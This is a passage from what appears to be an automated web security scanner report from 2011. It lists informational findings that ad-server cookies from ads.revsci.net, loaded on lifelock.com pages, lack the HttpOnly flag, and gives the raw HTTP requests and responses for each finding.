GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/how-it-works/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_2Ia5="MLsXr98vcS5joAD3TrInbrsHB6iUxxv6U9Ewo82dvq95LzyKcUd+SGxI5LXUVUbqNw0KcSykIgDMCLZ+LUekPkU3ZzHAnufPANfumkONPJ1vRRh59tenoHHjrRb5k67Sm6BnvhZOe1mCSUSYzT/0fgOACtqy5iXVomtxAZzacvIs1os8ctiYILCzcUGEKwAUbYDZ+gRfyTNVizEkjHghBeBOehkXDWkFVpZNcmrau472yi7Tk1UQDlT2PRGx4ny6aEMndDmCQRPdzJomsgEPKOZANGnQYsYrLEvr+wJqPo2Md9XyeSIz5rA/HijFNKINO3FJhacxFZoYVdm5OhizDcF2J4MFaMQYQ5VLkgCwK5k1whxQ3zMkV3gw6CsqcayotvrS10X59UwbUP/ABx6/FxtZ9qF5+9xsG5L3dw=="; rsi_us_1000000="pUMdJD9HMAYU1E2EPnsIIDz/BtZLv2rR/V4c7O6C3v7m/kxmFYk/sE+g72Wvze9j97z84DKAm0Rt9ZtbR0ijMugza0Qe5pDtWTr6P4O2VTn9svj69842Hfo95KEGQpbMeW+0NaNhmBYTXTkRQKS1XMUccblUZCb8d1ioTrWzOZ45+knAG4/fSC2XVCuSI3SfynIhw/0lJepQCzIltDUGLYzLUkLv/MFxI8xXEt5FPdByafvFHnwcc+g50hOTbL+g7n64N54Np8vbYE35aYyaJiGjpBaC12VhkZlzFtMxirRDAwPWID4NdT8+H1n+vIDBsAcC4v6vpxRHAQWP/wFECr4Zl33i7snI0unkbnfWDKcc2lBdCDsvleyPGu7IGOFhOgsC4wPBBfAj1GcROo+BilbXokC4Pz9vadLAfzLPlIdm0h4ILB9XSlyVc4b6FJRKQ8GSIuCUsCUIuhiY7qOe4dxMbmgcF8Z5vsbPVtNU5unXYkl1MhFPAXo6dObcC7t2Mp4lHB3smqaDjmSWTHYhcyvCsdckm7oUK5b0m3OWakUES9n6/gVIYIYYx4Q8OEV/NJVzUMJ3P0YTcfNkdzUeqj3w7I6vhwmxCxO1HK1RTc4UB35R4M3XJY0QrizGyoGlm9y6oPqyNcDNzYKTvC6oJGklEo2V4PXXhd5rDMHIhx2MXWu4IK+b30e7OfPWDWKlQbvGkOch0VHJWX9SvL5QvXWojkDL40JInzmAVr4XQyDFi7ty6xaQdTP7HzqDar+jK2lgMToKlZIkWUobdESNbO5VUYuF6zbZ/f7YfwXtEOZYHnlawNXis8+0xTL3web3W3GLT/ZTAh4qtrkjAQnd3V8EdMPIYePwpRv8DD3B2L4a6XH5lygIq/vjuHhcNjMMUQ+X+fLAOHHNWjDM+52IKUhADIXMSqGCsUEAyiBu5V+I6rJBxrv9bh4sTdGrxy8QWKFJQU2vB09tMV34No6/mhl+STAB+L7fmkFhELkBHvTZutKd7KYQ1aPWbdRmJfIrHLhmsKllabrGbl63"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_2Ia5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_2Ia5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Kz1B="MLsXr98vcS5joAD3bWnZbLvnP/+KE1cvxxz+0wdb2PxBN+R0RSFIK3cKZ3+o5AVFSd5d5ssFdZ2XdS1J6ERW+BtM90GwO1Jf3J+svMJ4/csB8HP99h1rKGCqCGIh2xYI3Fvzvh3NuiMBnovWFDuF1xjfsYP1R8qsG42VULSa+sr/35iz34m/11lMDXN1AX9njioLN2ChPaIXlfxBectuiUVgU0P45W3JtxbyyxtPjFDFvSB3z65Y465ibv+/5utsqAHA6C7nBh6djpodR2d3ogV4aXJvd1v+vu8G0OhpMAsq67dES6DnMmod26xlYmpIm7oLLHQreFyS+X9JpEnNjiLVeG1pqatl8HZNbwSbBG8PdUu8OmYBIq2J4KA3tC3AUVE/bcNrvKaXikFYzLm/nYzn3T771H+QePf7"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJD9HMAYYlW23lB1elXr9hid7vWrRtcbg/87S4gsVar0CeCLBpcKI72Wvze9j97z84TKAm0Rt9ZtbR0ijMugza0Qe5pDtWTr6P4O2VTn9OWf69842Hfphbg/yHhecjeZxoBUgnlB/F2HdUOiY/FnNpAR6Yb4p11NSMhG/KP2u7EP6r3IydGDFeOiju1DJKUDpjfkg6EczNi2MImmflQIF1cOVVjLfTIctA84K1Duqop5MuAE9pP2A+QQfoGhYngbnTf97wilg35GyS3/8ryDOEJH5EumfAisx5oE+dY3kzYargOAvr0G9H+GYdgpAvQb5TKPGOgN6EiCaPSm5rnJxzMqA6rO3mpCX77qa2Ho0jD3aEltyb9bJMqJ9PwqUsVpjeSYp4WGNO3JRdKJxgfniKDmNefa2d1BW2Wh8kghoYpxfExL2Wjyu5Ewt0XZcuSo4HFo+cf7EfuqX3CStW3aNIaM2ycgH5HD7+aiYvP6CLDcIR9llQyuAnOJlOgf1SYPoNDEZiaROfoFMHCCACbTyTwsIZo7gKIyJzj6oBezmQIyuVdfB0qAsJlBrbXvSia2r0+p3f1uNsfNkdzUeqiXwrKqeL0cfZ/vrFCCr/HEZmnQwfSO4bhpS1mYMFRTXljVGrQBXZP23w1g4SB2g2r6MHc5Pzt36KPxeMWOL5418bzHZdWwqa13n89Ok/6a1QUG2VDo9UTTOb+JLnM2sYKk7sbkOFh4SBVM8phfg7sZLufZucWACOs/NLHHFV5agvJZmE1D0bSq1HSY5y44BZhNz2hBTwyEyITUaX2uP/Q1XHnliwNTiMU60QUP3w+Y3RPX0z5E/HIUe5Kt7Agvbwl+yWOum+d0YXNX2zxnx903R08ea5ceS5PWRH/1MT2luVJbro74r6EmLVmoshJLasg7fnzqszJ2WV9c+bKMnT+z8ZN1FhKx/K0FWoUf1EEuWbvAz4cqAfgEtHfT8+fo6aj/rPHGUjNsNae6l1VttJItBc2XnDjizNH7anCs3JH29ZpHJCcZvoOS6ifQ3AsA="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 03:08:50 GMT


14.25. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_BFfo="MLsXr9EvcS5joBDnTrInbrvzpTlezxNylzFx7q/7jh3vp9AaQ0d9+4VlnSrvgBJz6voGf2x+1Z6RdS2pI5TjgfZ77T3M2t7X2iBHBnAKpH5maLzmozIHYGm7ZsUgnorFipEdgxPJ/VuCSUSeSzr0fhvZs1RpQ2eynAXm+ZYRA0lY99PWYzTVxA+dgG4eyEo6fI6nOFv7VETg9VbOEYxF1bxw9rxFW2/VYfto5WLdqS8AVUs4gxrGXxowSUIPPw4TaPajZMsEG9QysBpXO9+vMJzhH7J7pRXm6jp5YWVv1nqFVwl5k//RXPfOpv8fCdS04EgjnPjAmJGexMwDpJoGPjBw2JOksGDgcEossWHD46TEJ5Ur3vHnDUTUWzfCTfvl2X7FBShnd/mjEZgT/74wiYnRHCJHCNJv/RnwYw=="; rsi_us_1000000="pUMdJE+jMAYYlW2ENhuq3soHtWbj6GKPTeto2o206rx7XdHqk2MHqUdc4h3G8jE1Gdx1SeuNf4n9FXqajQPusTp1Jcs8ZjfglfknWAN/Q1IfyZw5h0t1bS95yIeZFtkPXSC2LxApOiqcQjM6vzFrEqEYTBt+vGOrPGvAgmk6EujcF1pARpPpVf1t8GJcgXgZqGCYmfomxtXdEgF5VKMZEFWBmbNUKntEp+ukrNGGBkXCmINvvD2jww0YZ7hmZNBoLNjfcex0Zl4CJC36Z4USPuYYx7VVLswcQ1f1IVJRi0dVP1rSjeVFf/+1/xUY2A6W6SqbcuheULZgHUExIivYRsyPM4kPKIi65s9jlw8b0ygRfbJv54fQ2wlpR9gVd2SFYgoO7k+RZWUd0XDMaGcg3JqM/wuDmnuWWb0A4COsclOeEQtHtMWW3/snkkNcgVm7VDJfkCm6cjOTrvlOItggKPIusbL1l9SCaB99VdIjRitqqb3WE8ef2luiUylYJxjwzBtb+QBbLiC7/pZjNWAycY5tP/aRFsAiCBupTjGYjm2g0lHMDqDrmlPMoscSYxhTTPv0KuN3m/EHY62T5Ybif1g+5CbvHd48MQZdo4gIxa2ziYKirixPgI/vnDwea4BL4iinQWN+AIncp4UYoiLCWtpcrIRtS9MgPS6DIFnjQGyv2+z+jIrmAoHMMiwl2RATjCQeV+rkFcTCsGNYksONovJdR5NKAGZWNoFpiSfZPYB1taJHpApkWWC5HQR2TSEsOPvnrTO97GqGy3v+4KyaxwMFuCLHS2kq0YgKXQMBA7NAdk77MeO9hTm31Gm0RKqWr8kM45JW+VUIho7H9Y8jWf7dAfdzDjskSOFAYILVnxSgKnS47RV57TZ72P1HE0E82c+PZVqML3+BjNrt1HwJ5CeCU3tHXiQJc2q8DAT4Eh6R5wsQQa1LW7rHc8JX9ATBuaDtmPphjkIZ8U0vbrZ9Ik58JYB0K4lccxDWK7o1rKItXy97q+0Szc2/Ipa3ZbyO1slKuyCzgqZbam9cmA=="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_BFfo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_BFfo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_btY7="MLsXr98vcS5joAC3cWnZbLu/LxacmO6l/ARkBxpP1JJrJebK5u0oIec5hQtxppxsRjkmyEG97JGtnHKzbcarrWXvOcKbltf7xkGa+l8zg6NsPWUKQV5HJAXQeFCR30Ociq0ao4q/grq6lsLC0KtAAADMs0buh6LSM9MG0LIcGHe70yIHgew/Eh0uLc+4c/4njp7GcyDdtqAZMSdSszG+gH0nvDhtaDXsHq2y65tYaObosUQZbnlscgHkfcZA4xP0oaQn/Lk2j36bu66uGkRrS4CsiWzoeFXOeaMh4yHFMNx7MqLYBUYmEVrbUD55ScTBefUUF0U4E7w5UEa9kMK7iC9gTmt3xw0L/2hRO9SwVqZNP64GcOJoZDuIezY3VtCazAUM7wNTb7K0tPc0/B538LlHHOIWHyDI6Pcx"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJD9HMAYYlW23lB1elXr9hifjv2rR/V4c+8rGrfYpD4E7DYk/sDOMiD26ze9j90z9N83XdjZt9ZtbR0ijMugza0Qe5pDvWTr6P4O2VQdjPWf6987WWc8u5KEGwpBscqKQZ1BB2LCvdm6n578p4Rvu6q0mDJHnkT/2jbqILCYLacH0wg0BO/PRs5ivndkckUxb3rhBm6zdK7VzeQeU44tgNRzskkGjN35lToNd85zTK6Vj+9BBbxpbelASsgX6/CR8Y5xVC8aI0ZxOO9+xP1LJ2VtAHTZTiV00au+sbBtvKMxT926tMzK0H5cwsw+g/cYgBE0rDkLsCjUxh6FLjC7i6EMGwHUbcgJhoCDKlItJyK8FU8pMQoukW4Ksl1ZOpqZ7GC0HHNVqD6t3U32r9sbTyZkKK+QA8JjzMDrdR4tTUP2OU1HeXuSVxv1yl+5/L2aqQXy3rE21OIbAG0Txff9Q6+QE4SRR2rr8yhSPM8aOTW2BlGO/zv4pDbki5ENYG1rAwHxPcsScK1CIu7nP426FZdWFs4e21wjcqJyCbd5JPJ40ccpki7u1RrKAV+CG6LFFkj53H1SCrbYfOIRrLfH5rh4eL0cfZ/vrFCCr/HEZmnQwfSO4bhpS1mYMFRTXljVGrQBXZP23w1g4SB2h2r6MHc5Pzt36KPxeMWOL5008JyU50uBQkV+DdYK4Gk+NchyAu4bzHS5mv/nQZXciumcSgzF8+UUvGNyoCfGNhSTai5t86Aacd0zjGzqDaj+g6z+b8nem9ZIkW8qaa0CMbJFNkcqd6zbZHfm4bwKc4OXmjNFwXw/aqQPgXGZdNiAABShzNlnnILNvQI/L4iLNmM8NLZISUdj8Bywe/xU4CPbov0NZunyZnU87RNKIJ8ju6qLTygwGnjEmKh4STE2cZsDOvcNSCTjfRSj9TWHSYPlOxGSR3K91I2CEvVf/GjySVjhJlm3bhym+JGHVNPjKwzs0PgWWBuKLIQBlJoyq1iJREoGQ2gRM+eiMu3rkpU9zbDFvwNQMS8je4aRvBwY="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 03:08:31 GMT


14.26. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/guarantee/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_Kz1B="MLsXr98vcS5joAD3bWnZbLvnP/+KE1cvxxz+0wdb2PxBN+R0RSFIK3cKZ3+o5AVFSd5d5ssFdZ2XdS1J6ERW+BtM90GwO1Jf3J+svMJ4/csB8HP99h1rKGCqCGIh2xYI3Fvzvh3NuiMBnovWFDuF1xjfsYP1R8qsG42VULSa+sr/35iz34m/11lMDXN1AX9njioLN2ChPaIXlfxBectuiUVgU0P45W3JtxbyyxtPjFDFvSB3z65Y465ibv+/5utsqAHA6C7nBh6djpodR2d3ogV4aXJvd1v+vu8G0OhpMAsq67dES6DnMmod26xlYmpIm7oLLHQreFyS+X9JpEnNjiLVeG1pqatl8HZNbwSbBG8PdUu8OmYBIq2J4KA3tC3AUVE/bcNrvKaXikFYzLm/nYzn3T771H+QePf7"; rsi_us_1000000="pUMdJD9HMAYYlW23lB1elXr9hid7vWrRtcbg/87S4gsVar0CeCLBpcKI72Wvze9j97z84TKAm0Rt9ZtbR0ijMugza0Qe5pDtWTr6P4O2VTn9OWf69842Hfphbg/yHhecjeZxoBUgnlB/F2HdUOiY/FnNpAR6Yb4p11NSMhG/KP2u7EP6r3IydGDFeOiju1DJKUDpjfkg6EczNi2MImmflQIF1cOVVjLfTIctA84K1Duqop5MuAE9pP2A+QQfoGhYngbnTf97wilg35GyS3/8ryDOEJH5EumfAisx5oE+dY3kzYargOAvr0G9H+GYdgpAvQb5TKPGOgN6EiCaPSm5rnJxzMqA6rO3mpCX77qa2Ho0jD3aEltyb9bJMqJ9PwqUsVpjeSYp4WGNO3JRdKJxgfniKDmNefa2d1BW2Wh8kghoYpxfExL2Wjyu5Ewt0XZcuSo4HFo+cf7EfuqX3CStW3aNIaM2ycgH5HD7+aiYvP6CLDcIR9llQyuAnOJlOgf1SYPoNDEZiaROfoFMHCCACbTyTwsIZo7gKIyJzj6oBezmQIyuVdfB0qAsJlBrbXvSia2r0+p3f1uNsfNkdzUeqiXwrKqeL0cfZ/vrFCCr/HEZmnQwfSO4bhpS1mYMFRTXljVGrQBXZP23w1g4SB2g2r6MHc5Pzt36KPxeMWOL5418bzHZdWwqa13n89Ok/6a1QUG2VDo9UTTOb+JLnM2sYKk7sbkOFh4SBVM8phfg7sZLufZucWACOs/NLHHFV5agvJZmE1D0bSq1HSY5y44BZhNz2hBTwyEyITUaX2uP/Q1XHnliwNTiMU60QUP3w+Y3RPX0z5E/HIUe5Kt7Agvbwl+yWOum+d0YXNX2zxnx903R08ea5ceS5PWRH/1MT2luVJbro74r6EmLVmoshJLasg7fnzqszJ2WV9c+bKMnT+z8ZN1FhKx/K0FWoUf1EEuWbvAz4cqAfgEtHfT8+fo6aj/rPHGUjNsNae6l1VttJItBc2XnDjizNH7anCs3JH29ZpHJCcZvoOS6ifQ3AsA="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Kz1B=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Kz1B=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Uihs="MLsXr98vcS5joAD3Ramm7m1t+VG2u86F7odjMpPWFVoxB1SJLO0k7UGOYbbf8s8JwOo38i801L3UUpBivWyOp/577cI3mcnXAMS8oxiDDVp8H1BGXR3pIUBTO7FKrI7Km7BHstMovCk8DJLbgwN2wt/S3/iJ9f6MyG7GkFGqxvSem7K9r4yjmiQLUCCesqM4fw+vm8qLr7Pl6R55NhiwdK8AeGKycXRkK6kZZOOdtv9lCrPwX1hpNjhvRGV9wQXjWeXpq2LuHOSBArCH67JFEDRLnajtbNk3TMVytWT4Z4wi1GXZQb//Zfdfkj/gDfRRKLTWu9FT+q8awI+fnYB/OYTeMmZZOEqoB2TEOxgpmKNftUwnqldNqerushNz7sP1NAJwWHc3RbB+ptOuus8j9ey35j2110rTiRX28w=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
